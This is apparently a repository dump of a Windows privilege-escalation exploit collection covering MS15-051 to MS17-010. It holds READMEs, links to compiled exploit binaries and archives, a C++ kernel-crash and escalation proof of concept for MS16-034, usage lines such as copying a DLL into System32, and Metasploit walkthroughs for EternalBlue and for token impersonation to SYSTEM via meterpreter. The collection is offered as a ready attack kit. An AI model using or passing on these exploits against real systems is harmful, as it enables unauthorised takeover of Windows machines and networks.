/MS15-051/Compiled/Taihou32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/Compiled/Taihou32.exe -------------------------------------------------------------------------------- /MS15-051/Compiled/Taihou64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/Compiled/Taihou64.exe -------------------------------------------------------------------------------- /MS15-051/MS15-051-KB3045171.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/MS15-051-KB3045171.zip -------------------------------------------------------------------------------- /MS15-051/README.md: -------------------------------------------------------------------------------- 1 | # MS15-051 2 | 3 | - The POC was from [@hfiref0x](https://github.com/hfiref0x/CVE-2015-1701) 4 | 5 | Vulnerability reference: 6 | * [MS15-051](https://technet.microsoft.com/en-us/library/security/ms15-051.aspx) 7 | * [CVE-2015-1701](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe) 8 | 9 | 10 | ## Usage 11 | ``` 12 | c:\> MS15-051.exe whoami 13 | ``` 14 | ![win7](win7.png) 15 | ![2008](2008.png) 16 | 17 | ## load the module within the Metasploit console 18 | ``` 19 | msf > use exploit/windows/local/ms15_051_client_copy_image 20 | msf exploit(ms15_051_client_copy_image) > show targets 21 | ...targets... 22 | msf exploit(ms15_051_client_copy_image) > set TARGET 23 | msf exploit(ms15_051_client_copy_image) > show options 24 | ...show and set options... 25 | msf exploit(ms15_051_client_copy_image) > exploit 26 | ``` 27 | 28 | ### Links 29 | 30 | * [Win32k Elevation of Privilege Vulnerability](https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html) 31 | 32 | 33 | -------------------------------------------------------------------------------- /MS15-051/ms15-051.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/ms15-051.zip -------------------------------------------------------------------------------- /MS15-051/win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/win7.png -------------------------------------------------------------------------------- /MS15-061/README.md: -------------------------------------------------------------------------------- 1 | # MS15-061 2 | 3 | - Exploiting MS15-061 with reverse engineering Win32k.sys by 4 | - The exp was from [@Rootkitsmm](https://github.com/Rootkitsmm/MS15-061) 5 | 6 | 7 | Vulnerability reference: 8 | * [MS15-061 ](https://technet.microsoft.com/en-us/library/security/ms15-061.aspx) 9 | * [CVE-2015-1726](https://www.exploit-db.com/exploits/38269/) 10 | 11 | 12 | ### Links 13 | 14 | * [利用 MS15-061 Windows 内核释放后重用漏洞](https://github.com/LibreCrops/translation-zh_CN/blob/master/source/ms-15-061.rst) 15 | 16 | 17 | -------------------------------------------------------------------------------- /MS15-076/Binary/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/Binary/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /MS15-076/Binary/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/Binary/Trebuchet.exe -------------------------------------------------------------------------------- /MS15-076/README.md: -------------------------------------------------------------------------------- 1 | # MS15-076 2 | 3 | - We can Copies a file to any privileged location on disk 4 | 5 | - The POC was from [@monoxgas](https://github.com/monoxgas/Trebuchet) 6 | 7 | 8 | Vulnerability reference: 9 | * [MS15-076](https://technet.microsoft.com/en-us/library/security/ms15-076.aspx) 10 | * [CVE-2015-2370](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2370) 11 | 12 | 13 | ### notes 14 | - Exploit can only be one once every 2-3 minutes. This is because RPC can be held up by LocalSystem 15 | - The destination file can't already exist 16 | - Tested on x64/x86 Windows 7/8.1 17 | - Microsoft.VisualStudio.OLE.Inerop.dll must be in the same directory 18 | 19 | ### Usage 20 | 21 | c:\> trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll 22 | 23 | 24 | ### Links 25 | 26 | * [lightly modified Proof of Concept by James Forshaw with Google]( https://code.google.com/p/google-security-research/issues/detail?id=325) 27 | 28 | 29 | -------------------------------------------------------------------------------- /MS15-076/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/source.zip -------------------------------------------------------------------------------- /MS15-077/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/2003.png -------------------------------------------------------------------------------- /MS15-077/HTFontExp.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/HTFontExp.rar -------------------------------------------------------------------------------- /MS15-077/MS15-077-KB3077657.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/MS15-077-KB3077657.zip -------------------------------------------------------------------------------- /MS15-077/README.md: -------------------------------------------------------------------------------- 1 | # MS15-077 2 | 3 | ``` 4 | An elevation of privilege vulnerability exists in Adobe Type Manager Font Driver (ATMFD) when it fails to properly handle objects in memory. 5 | An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. 6 | An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 7 | ``` 8 | 9 | Vulnerability reference: 10 | * [MS15-077](https://technet.microsoft.com/zh-cn/library/security/MS15-077) 11 | * [CVE-2015-2387](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2387) 12 | * [exp-db](https://www.exploit-db.com/exploits/37098/) 13 | 14 | ## Usage 15 | ``` 16 | c:\> elevator.exe whoami 17 | ``` 18 | ![2003](2003.png) 19 | ![win7](win7.jpg) 20 | ![win7-x64](win7-x64.png) 21 | 22 | ## References 23 | - [Exploiting_CVE_2015_2426_-_Release](https://www.google.com.hk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwjwupmJxrDUAhUG5mMKHcZpBw8QFghkMAk&url=https%3A%2F%2Fwww.nccgroup.trust%2Fglobalassets%2Four-research%2Fuk%2Fwhitepapers%2F2015%2F09%2F2015-08-28_-_ncc_group_-_exploiting_cve_2015_2426_-_release.pdf&usg=AFQjCNGE4OcY0-mI_8hcki768ZMYmsXTtQ) 24 | -------------------------------------------------------------------------------- /MS15-077/elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/elevator.exe -------------------------------------------------------------------------------- /MS15-077/exp/WindowsServer2003-KB3077657-x64-ENU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/exp/WindowsServer2003-KB3077657-x64-ENU.exe -------------------------------------------------------------------------------- /MS15-077/exp/WindowsServer2003-KB3077657-x86-ENU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/exp/WindowsServer2003-KB3077657-x86-ENU.exe -------------------------------------------------------------------------------- /MS15-077/win7-x64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/win7-x64.png -------------------------------------------------------------------------------- /MS15-077/win7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/win7.jpg -------------------------------------------------------------------------------- /MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe -------------------------------------------------------------------------------- /MS15-097/38198/injected.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/38198/injected.dll -------------------------------------------------------------------------------- /MS15-097/MS15-097-KB3079904-CVE-2015-2527.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/MS15-097-KB3079904-CVE-2015-2527.zip -------------------------------------------------------------------------------- /MS15-097/README.md: -------------------------------------------------------------------------------- 1 | # MS15-097 2 | 3 | MS15-097 4 | 5 | Vulnerability reference: 6 | * [MS15-097](https://technet.microsoft.com/library/security/ms15-097) 7 | * [CVE-2015-2517](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2517) 8 | 9 | 10 | [CVE-2015-2546-Exploit](https://github.com/k0keoyo/CVE-2015-2546-Exploit) -------------------------------------------------------------------------------- /MS15-097/exp/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2015-2546-Exploit 2 | 3 | My paper about CVE-2015-2546: http://bobao.360.cn/learning/detail/3184.html 4 | 5 | My blog:http://whereisk0shl.top 6 | -------------------------------------------------------------------------------- /MS15-097/exp/_CVE_2015_2546_exp.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/exp/_CVE_2015_2546_exp.cpp -------------------------------------------------------------------------------- /MS16-014/ms16-014.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-014/ms16-014.rar -------------------------------------------------------------------------------- /MS16-016/39788/EoP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/39788/EoP.exe -------------------------------------------------------------------------------- /MS16-016/39788/Shellcode.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/39788/Shellcode.dll -------------------------------------------------------------------------------- /MS16-016/BSoD.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/BSoD.exe -------------------------------------------------------------------------------- /MS16-016/EoP.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/EoP.zip -------------------------------------------------------------------------------- /MS16-016/EoP_variant.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/EoP_variant.zip -------------------------------------------------------------------------------- /MS16-016/README.md: -------------------------------------------------------------------------------- 1 | # MS16-016 2 | 3 | - The POC of MS16-016 was from [@Tamás Koczka](https://github.com/koczkatamas/CVE-2016-0051) 4 | - A variant of this PoC [3hexx0r](https://github.com/hexx0r/CVE-2016-0051) 5 | 6 | 7 | Vulnerability reference: 8 | * [MS16-016](https://technet.microsoft.com/en-us/library/security/ms16-016.aspx) 9 | * [CVE-2016-0051](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051) 10 | 11 | ### EoP to SYSTEM on Windows 7 SP1 x86 12 | 13 | ![Elevation of Privilege on Windows 7 x86 before the patch](eop_win7x86.gif) 14 | 15 | ### BSoD on a Windows 10 x64 16 | 17 | ![Crash on a Windows 10 x64 before the patch](bsod_win10x64.gif) 18 | 19 | ### msf 20 | ``` 21 | msf > use exploit/windows/local/ms16_016_webdav 22 | ``` 23 | 24 | ### Links 25 | 26 | * [Microsoft Security Bulletin MS16-016](https://technet.microsoft.com/en-us/library/security/ms16-016.aspx) 27 | * [Microsoft Acknowledgements page](https://technet.microsoft.com/library/security/mt674627.aspx) 28 | 29 | You can find both exploits on Exploit-db 30 | 1) koczkatamas 31 | https://www.exploit-db.com/exploits/39432/ 32 | 33 | 2) hex0r 34 | https://www.exploit-db.com/exploits/39788/ 35 | 36 | -------------------------------------------------------------------------------- /MS16-016/bsod_win10x64.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/bsod_win10x64.gif -------------------------------------------------------------------------------- /MS16-016/eop_win7x86.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/eop_win7x86.gif -------------------------------------------------------------------------------- /MS16-032/README.md: -------------------------------------------------------------------------------- 1 | # MS16-032 2 | 3 | - The POC of MS16-032 was from [exp-db](https://www.exploit-db.com/exploits/39719/) 4 | - The exp(ms16-032.exe) was from [@khr0x40sh](https://github.com/khr0x40sh/ms16-032) 5 | 6 | Vulnerability reference: 7 | * [MS16-135](https://technet.microsoft.com/en-us/library/security/ms16-032.aspx) 8 | * [CVE-2016-0099](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0099) 9 | 10 | ## Targets 11 | - Windows x86 12 | - Windows x64 13 | 14 | ### Usage of MS16-032.ps1 15 | 16 | ![x86](img/x86.png) 17 | 18 | ![x64](img/x64.png) 19 | 20 | ### Windows 10 21 | 22 | ![Win10](img/win10.png) 23 | 24 | *** 25 | 26 | ## Use on msf 27 | 28 | This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores. 29 | 30 | ``` 31 | msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 32 | msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets 33 | ...targets... 34 | msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET 35 | msf exploit(ms16_032_secondary_logon_handle_privesc) > show options 36 | ...show and set options... 37 | msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit 38 | ``` 39 | -------------------------------------------------------------------------------- /MS16-032/img/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/win10.png -------------------------------------------------------------------------------- /MS16-032/img/x64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/x64.png -------------------------------------------------------------------------------- /MS16-032/img/x86.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/x86.png -------------------------------------------------------------------------------- /MS16-032/x64/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/x64/ms16-032.exe -------------------------------------------------------------------------------- /MS16-032/x86/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/x86/ms16-032.exe -------------------------------------------------------------------------------- /MS16-034/FillRgn_BSoD.cpp: -------------------------------------------------------------------------------- 1 | /** 2 | * Author: bee13oy of CloverSec Labs 3 | * BSoD on Windows 7 SP1 x86 / Windows 10 x86 4 | * EoP to SYSTEM on Windows 7 SP1 x86 5 | **/ 6 | 7 | #include 8 | 9 | #pragma comment(lib, "gdi32.lib") 10 | #pragma comment(lib, "user32.lib") 11 | 12 | unsigned int demo_CreateBitmapIndirect(void) { 13 | static BITMAP bitmap = { 0, 8, 8, 2, 1, 1 }; 14 | static BYTE bits[8][2] = { 0xFF, 0, 0x0C, 0, 0x0C, 0, 0x0C, 0, 15 | 0xFF, 0, 0xC0, 0, 0xC0, 0, 0xC0, 0 }; 16 | 17 | bitmap.bmBits = bits; 18 | 19 | SetLastError(NO_ERROR); 20 | 21 | HBITMAP hBitmap = CreateBitmapIndirect(&bitmap); 22 | 23 | return (unsigned int)hBitmap; 24 | } 25 | 26 | #define eSyscall_NtGdiSetBitmapAttributes 0x1110 27 | 28 | W32KAPI HBITMAP NTAPI NtGdiSetBitmapAttributes( 29 | HBITMAP argv0, 30 | DWORD argv1 31 | ) 32 | { 33 | __asm 34 | { 35 | push argv1; 36 | push argv0; 37 | push 0x00; 38 | mov eax, eSyscall_NtGdiSetBitmapAttributes; 39 | mov edx, addr_kifastsystemcall; 40 | call edx; 41 | add esp, 0x0c; 42 | } 43 | } 44 | 45 | void Trigger_BSoDPoc() { 46 | HBITMAP hBitmap1 = (HBITMAP)demo_CreateBitmapIndirect(); 47 | HBITMAP hBitmap2 = (HBITMAP)NtGdiSetBitmapAttributes((HBITMAP)hBitmap1, (DWORD)0x8f9); 48 | 49 | RECT rect = { 0 }; 50 | rect.left = 0x368c; 51 | rect.top = 0x400000; 52 | HRGN hRgn = (HRGN)CreateRectRgnIndirect(&rect); 53 | 54 | HDC hdc = (HDC)CreateCompatibleDC((HDC)0x0); 55 | SelectObject((HDC)hdc, (HGDIOBJ)hBitmap2); 56 | 57 | HBRUSH hBrush = (HBRUSH)CreateSolidBrush((COLORREF)0x00edfc13); 58 | 59 | FillRgn((HDC)hdc, (HRGN)hRgn, (HBRUSH)hBrush); 60 | } 61 | 62 | int _tmain(int argc, _TCHAR* argv[]) 63 | { 64 | Trigger_BSoDPoc(); 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /MS16-034/README.md: -------------------------------------------------------------------------------- 1 | # MS16-034 2 | 3 | 4 | (XP/Vista/Win7/Win8/2000/2003/2008/2012) 5 | 6 | My SSCTF pwn450 Windows Kernel Exploitation MS16-034 Writeup URL: 7 | http://whereisk0shl.top/ssctf_pwn450_windows_kernel_exploitation_writeup.html 8 | 9 | My blog: 10 | http://whereisk0shl.top 11 | -------------------------------------------------------------------------------- /MS16-075/README.md: -------------------------------------------------------------------------------- 1 | # MS16-075 2 | 3 | - The potato.exe was from [@FoxGlove](https://github.com/foxglovesec/RottenPotato) 4 | - For a technical overview of this [exploit]( https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) 5 | 6 | Vulnerability reference: 7 | * [MS16-075](https://technet.microsoft.com/library/security/MS16-075) 8 | 9 | 10 | ## RottenPotato 11 | 12 | Local Privilege Escalation from Windows Service Accounts to SYSTEM 13 | 14 | ## Videos for example 15 | - [SQL Server](https://www.youtube.com/watch?v=3CPdKMeB0UY) 16 | - [IIS](https://www.youtube.com/watch?v=wK0r-TZR7w8) 17 | 18 | ## Usage of msf 19 | ``` 20 | msf exploit(web_delivery) > set ExitOnsession false 21 | msf exploit(web_delivery) > run 22 | meterpreter > getuid 23 | Server username: IIS APPPOOL\DefaultAppPool 24 | meterpreter > getprivs 25 | =========================================================== 26 | Enabled Process Privileges 27 | =========================================================== 28 | SeAssignPrimaryTokenPrivilege 29 | 30 | meterpreter > upload /root/potato.exe C:\Users\Public 31 | meterpreter > cd C:\\Users\\Public 32 | meterpreter > use incognito 33 | meterpreter > list_tokens -u 34 | NT AUTHORITY\IUSR 35 | 36 | meterpreter > execute -cH -f ./potato.exe 37 | meterpreter > list_tokens -u 38 | NT AUTHORITY\IUSR 39 | NT AUTHORITY\SYSTEM 40 | 41 | meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" 42 | 43 | meterpreter > getuid 44 | Server username: NT AUTHORITY\SYSTEM 45 | ``` 46 | 47 | ### Get a shell has Privileges:SeAssignPrimaryTokenPrivilege 48 | 49 | ![iis](img/IIS_shell.png) 50 | 51 | ### Get system Privilege 52 | 53 | ![potato](img/potato.png) 54 | *** 55 | - It is important to impersonate the token (or run list_tokens -u) quickly after runnning the binary. 56 | - It is also important to follow the order of the steps. 57 | - Make sure you "use incognito" before running the binary. 58 | 59 | *** 60 | 61 | ## Tater 62 | 63 | a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit 64 | 65 | - The Tater was from [@Kevin-Robertson](https://github.com/Kevin-Robertson/Tater) 66 | ![win10](img/win10.png) 67 | -------------------------------------------------------------------------------- /MS16-075/img/IIS_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/IIS_shell.png -------------------------------------------------------------------------------- /MS16-075/img/potato.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/potato.png -------------------------------------------------------------------------------- /MS16-075/img/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/img/win10.png -------------------------------------------------------------------------------- /MS16-075/potato.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-075/potato.exe -------------------------------------------------------------------------------- /MS16-098/README.md: -------------------------------------------------------------------------------- 1 | # MS16-098 2 | - Exploiting MS16-098 RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects (CVE-2016-3309) 3 | - The exp was from [@0x5A1F](https://twitter.com/Saif_Sherei) 4 | 5 | Vulnerability reference: 6 | * [MS16-098](https://technet.microsoft.com/library/security/ms16-098) 7 | * [CVE-2016-3309](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3309) 8 | 9 | ## Usage 10 | ![win8.1](win8_1.png) 11 | 12 | ## References 13 | 14 | * [The previously discussed MS16-098 writeup](https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/) 15 | * [DC25 5A1F - Demystifying Windows Kernel Exploitation by Abusing GDI Objects](https://github.com/sensepost/gdi-palettes-exp) 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /MS16-098/bfill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/bfill.exe -------------------------------------------------------------------------------- /MS16-098/gdi-palettes-exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/gdi-palettes-exp.zip -------------------------------------------------------------------------------- /MS16-098/win8_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-098/win8_1.png -------------------------------------------------------------------------------- /MS16-111/40429.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/40429.exe -------------------------------------------------------------------------------- /MS16-111/README.md: -------------------------------------------------------------------------------- 1 | # MS16-111 2 | ``` 3 | The kernel API in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, 4 | Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 does not properly enforce permissions, 5 | which allows local users to obtain sensitive information via a crafted application, aka "Windows Kernel Elevation of Privilege Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS16-111](https://technet.microsoft.com/library/security/ms16-111) 10 | * [cve-2016-3371](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3371) 11 | * [exp-db](https://www.exploit-db.com/exploits/40429/) 12 | 13 | ## Usage 14 | ``` 15 | c:\> 40429.exe 16 | ``` 17 | * [CVE-2016-3371-YouTube](https://youtu.be/SzkbSRbxN1I) 18 | ![win8.1](win8.1.png) 19 | ![win10](win10.png) 20 | 21 | 22 | ### References 23 | - [Windows: NtLoadKeyEx User Hive Attachment Point EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=865) 24 | -------------------------------------------------------------------------------- /MS16-111/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/win10.png -------------------------------------------------------------------------------- /MS16-111/win8.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-111/win8.1.png -------------------------------------------------------------------------------- /MS16-135/40823-source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823-source.zip -------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823/SetWindowLongPtr_Exploit.exe -------------------------------------------------------------------------------- /MS16-135/40823/SetWindowLongPtr_Exploit.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/40823/SetWindowLongPtr_Exploit.pdb -------------------------------------------------------------------------------- /MS16-135/41015.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/41015.exe -------------------------------------------------------------------------------- /MS16-135/README.md: -------------------------------------------------------------------------------- 1 | # MS16-135 x64 Universal 2 | 3 | The POC for this bug was from [@b33f](http://www.fuzzysecurity.com/)'s post [here](https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135)! 4 | 5 | Vulnerability reference: 6 | * [MS16-135](https://technet.microsoft.com/en-us/library/security/ms16-135.aspx) 7 | * [CVE-2016-7255](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255) 8 | 9 | ## SYSTEM Shell 10 | 11 | The exploit works on all 64-bit vulnerable targets. 12 | 13 | ## Powershell Allowed script execution 14 | 15 | c:\> set-ExecutionPolicy RemoteSigned 16 | 17 | ### Windows 7 18 | 19 | ![Win7](Win7.png) 20 | 21 | ### Windows 8 22 | 23 | ![Win8](Win8.png) 24 | 25 | ### Windows 8.1 26 | 27 | ![Win81](Win81.png) 28 | 29 | ### Windows 10 30 | 31 | ![Win10](Win10.png) 32 | 33 | ### References 34 | * [MS16-135 x64 Universal](https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135) 35 | * [poc for CVE-2016-7255](https://github.com/tinysec/public/tree/master/CVE-2016-7255) 36 | -------------------------------------------------------------------------------- /MS16-135/Win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win10.png -------------------------------------------------------------------------------- /MS16-135/Win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win7.png -------------------------------------------------------------------------------- /MS16-135/Win8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win8.png -------------------------------------------------------------------------------- /MS16-135/Win81.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-135/Win81.png -------------------------------------------------------------------------------- /MS17-010/MS17-010-2012.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-010/MS17-010-2012.zip -------------------------------------------------------------------------------- /MS17-010/README.md: -------------------------------------------------------------------------------- 1 | # MS17-010 2 | 3 | - exp [FUZZBUNCH](https://github.com/exploitx3/FUZZBUNCH) 4 | 5 | Vulnerability reference: 6 | * [MS17-010](https://technet.microsoft.com/library/security/ms17-010) 7 | * [CVE-2017-0143](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143) 8 | * [CVE-2017-0144](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144) 9 | * [CVE-2017-0145](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145) 10 | * [CVE-2017-0146](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146) 11 | * [CVE-2017-0148](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148) 12 | * [CVE-2017-0147](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147) 13 | 14 | ## Usage 15 | ``` 16 | msf > use exploit/windows/smb/ms17_010_eternalblue 17 | msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13 18 | msf exploit(ms17_010_eternalblue) > run 19 | ``` 20 | 21 | ## References 22 | * [Windows2012上如何通过攻击ETERNALBLUE获得Meterpreter反弹](https://mp.weixin.qq.com/s?__biz=MzI5MzY2MzM0Mw%3D%3D&mid=2247483946&idx=1&sn=cbe2e5a08470d699daeb74d7904581c7&scene=45#wechat_redirect) 23 | * [MS17-017: Microsoft Windows 7 SP1 x86 Privilege Escalation Vulnerability](https://securityonline.info/ms17-017-microsoft-windows-7-sp1-x86-privilege-escalation-vulnerability/) 24 | -------------------------------------------------------------------------------- /MS17-017/MS17-017.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS17-017/MS17-017.exe -------------------------------------------------------------------------------- 